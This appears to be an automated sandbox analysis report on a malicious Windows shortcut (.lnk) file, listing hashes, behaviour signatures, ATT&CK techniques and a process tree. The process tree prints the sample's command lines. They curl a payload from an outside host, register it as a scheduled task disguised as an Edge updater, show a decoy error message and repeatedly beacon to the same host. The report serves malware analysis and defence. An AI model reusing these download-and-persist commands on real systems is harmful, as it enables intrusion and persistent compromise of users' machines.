414d6ed63baaaa69a555068e91e1ee89dbcf38cac7ac4918f6e50fb82d039485

Resubmissions

06/03/2024, 15:01

240306-sdvz9sbf8t 7

06/03/2024, 14:59

240306-sc3cysah54 3

06/03/2024, 14:41

240306-r2taxagc37 7

Analysis

max time kernel
388s
max time network
302s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
06/03/2024, 15:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

414d6ed63baaaa69a555068e91e1ee89dbcf38cac7ac4918f6e50fb82d039485.lnk
Size

2KB
MD5

10f4479d5f531def842a712277ae9611
SHA1

bdb075abba517e216a41933cec5b30b4d50c0e76
SHA256

414d6ed63baaaa69a555068e91e1ee89dbcf38cac7ac4918f6e50fb82d039485
SHA512

5306675e38c391bb39a9b4a7bbcbeaf807e2e10bd8e1d5e560e49c77802946b39f033f653954db998d130edb08fc1add8b4dd199c4ab019c4e33fd25fcb57382

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
3720	schtasks.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings	OpenWith.exe

Opens file in notepad (likely ransom note) 2 IoCs

ransomware

pid	Process
3180	NOTEPAD.EXE
3408	NOTEPAD.EXE

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeTcbPrivilege	1944	svchost.exe
Token: SeRestorePrivilege	1944	svchost.exe
Token: SeManageVolumePrivilege	1916	svchost.exe

Suspicious use of SetWindowsHookEx 9 IoCs

pid	Process
3132	OpenWith.exe
3132	OpenWith.exe
3132	OpenWith.exe
3132	OpenWith.exe
3132	OpenWith.exe
3132	OpenWith.exe
3132	OpenWith.exe
3132	OpenWith.exe
3132	OpenWith.exe

Suspicious use of WriteProcessMemory 26 IoCs

description	pid	Process	procid_target
PID 4500 wrote to memory of 4860	4500	cmd.exe	89
PID 4500 wrote to memory of 4860	4500	cmd.exe	89
PID 4860 wrote to memory of 3588	4860	conhost.exe	90
PID 4860 wrote to memory of 3588	4860	conhost.exe	90
PID 3588 wrote to memory of 3916	3588	cmd.exe	91
PID 3588 wrote to memory of 3916	3588	cmd.exe	91
PID 3588 wrote to memory of 3720	3588	cmd.exe	95
PID 3588 wrote to memory of 3720	3588	cmd.exe	95
PID 3588 wrote to memory of 2624	3588	cmd.exe	96
PID 3588 wrote to memory of 2624	3588	cmd.exe	96
PID 2196 wrote to memory of 1968	2196	cmd.exe	125
PID 2196 wrote to memory of 1968	2196	cmd.exe	125
PID 2196 wrote to memory of 3252	2196	cmd.exe	126
PID 2196 wrote to memory of 3252	2196	cmd.exe	126
PID 2196 wrote to memory of 4832	2196	cmd.exe	127
PID 2196 wrote to memory of 4832	2196	cmd.exe	127
PID 1944 wrote to memory of 3112	1944	svchost.exe	132
PID 1944 wrote to memory of 3112	1944	svchost.exe	132
PID 3132 wrote to memory of 3180	3132	OpenWith.exe	134
PID 3132 wrote to memory of 3180	3132	OpenWith.exe	134
PID 2196 wrote to memory of 1284	2196	cmd.exe	136
PID 2196 wrote to memory of 1284	2196	cmd.exe	136
PID 2196 wrote to memory of 3740	2196	cmd.exe	137
PID 2196 wrote to memory of 3740	2196	cmd.exe	137
PID 2196 wrote to memory of 3512	2196	cmd.exe	138
PID 2196 wrote to memory of 3512	2196	cmd.exe	138

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\414d6ed63baaaa69a555068e91e1ee89dbcf38cac7ac4918f6e50fb82d039485.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4500
- C:\WINDOWS\system32\conhost.exe
  "C:\WINDOWS\system32\conhost.exe" --headless cmd /c curl -o C:\Users\Public\Documents\config.xml demolaservices.com/mml.php & schtasks /create /tn MicrosoftEdgeUpdateEngine /xml C:\Users\Public\Documents\config.xml & msg * "Incompatible Windows version. Try another Windows PC."
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4860
- - C:\WINDOWS\system32\cmd.exe
    cmd /c curl -o C:\Users\Public\Documents\config.xml demolaservices.com/mml.php & schtasks /create /tn MicrosoftEdgeUpdateEngine /xml C:\Users\Public\Documents\config.xml & msg * "Incompatible Windows version. Try another Windows PC."
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3588
  - - C:\Windows\system32\curl.exe
      curl -o C:\Users\Public\Documents\config.xml demolaservices.com/mml.php
      4⤵
      PID:3916
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /tn MicrosoftEdgeUpdateEngine /xml C:\Users\Public\Documents\config.xml
      4⤵
      Creates scheduled task(s)
      PID:3720
  - - C:\Windows\system32\msg.exe
      msg * "Incompatible Windows version. Try another Windows PC."
      4⤵
      PID:2624

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2196
- C:\Windows\system32\curl.exe
  curl -o C:\Users\public\documents\tmp.jpg demolaservices.com/dxl.php?bb=QMWIRSIY_Admin
  2⤵
  PID:1968
- C:\Windows\system32\more.com
  more C:\Users\public\documents\tmp.jpg
  2⤵
  PID:3252
- C:\Windows\system32\cmd.exe
  cmd
  2⤵
  PID:4832
- C:\Windows\system32\curl.exe
  curl -o C:\Users\public\documents\tmp.jpg demolaservices.com/dxl.php?bb=QMWIRSIY_Admin
  2⤵
  PID:1284
- C:\Windows\system32\more.com
  more C:\Users\public\documents\tmp.jpg
  2⤵
  PID:3740
- C:\Windows\system32\cmd.exe
  cmd
  2⤵
  PID:3512

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1564

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1944
- C:\Windows\system32\dashost.exe
  dashost.exe {c15c4beb-1d17-4b1b-b27ff51f78cb298c}
  2⤵
  PID:3112

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3132
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Documents\tmp.jpg
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:3180

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
1⤵
PID:2908

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1916

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Documents\tmp.jpg
1⤵
- Opens file in notepad (likely ransom note)
PID:3408

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\Documents\config.xml

Filesize
2KB

MD5
1937af09268af0f1ee47eabb62a28f2c

SHA1
551433d0819679f3f37e370e2b51e35336194c80

SHA256
1ba020416e58b45e42a854dace76cca56bebbdeebfd0abdfb4a33c12a22390d4

SHA512
093b9f5a4ff6fe00b7bd2ed113e220f19cc0a96ac2eaf4993ca62a05706a955353a7a7cbaa86f7630883fd680cfb95107249be42da69c94259742d6284f7b94c

Download Submit
memory/1916-2-0x00000161D9760000-0x00000161D9770000-memory.dmp

Filesize
64KB

Download
memory/1916-18-0x00000161D9860000-0x00000161D9870000-memory.dmp

Filesize
64KB

Download
memory/1916-34-0x00000161E1BD0000-0x00000161E1BD1000-memory.dmp

Filesize
4KB

Download
memory/1916-36-0x00000161E1C00000-0x00000161E1C01000-memory.dmp

Filesize
4KB

Download
memory/1916-37-0x00000161E1C00000-0x00000161E1C01000-memory.dmp

Filesize
4KB

Download
memory/1916-38-0x00000161E1D10000-0x00000161E1D11000-memory.dmp

Filesize
4KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads